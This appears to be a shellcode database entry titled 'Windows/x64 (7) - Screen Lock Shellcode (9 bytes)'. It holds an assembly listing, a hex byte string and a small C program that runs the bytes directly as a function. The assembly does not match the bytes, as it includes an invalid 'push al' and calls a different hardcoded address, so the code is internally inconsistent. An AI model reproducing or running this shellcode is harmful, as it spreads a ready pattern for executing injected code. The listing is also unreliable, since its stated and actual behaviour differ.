Windows/x64 (7) - Screen Lock Shellcode (9 bytes)
Author: Saswat Nayak
type:
platform: windows_x86-64
port:
date_added: 2020-01-22
date_updated: 2021-01-15
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
# Title: Windows/7 - Screen Lock Shellcode (9 bytes)
# Author: Saswat Nayak
# Date: 2020-01-22
# Shellcode length 9
# Tested on: Win 7 SP1-64
/*
***** Assembly code follows *****
xor eax,eax
xor ebx,ebx
xor ecx,ecx
mov eax,0x00000002
mov ebx,0x00020000
push ebx
push al
mov ecx,0x77661497
call ecx
*/
char code[]=
"\x31\xC0\xB8\x6F\x86\x67\x77\xFF\xD0";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}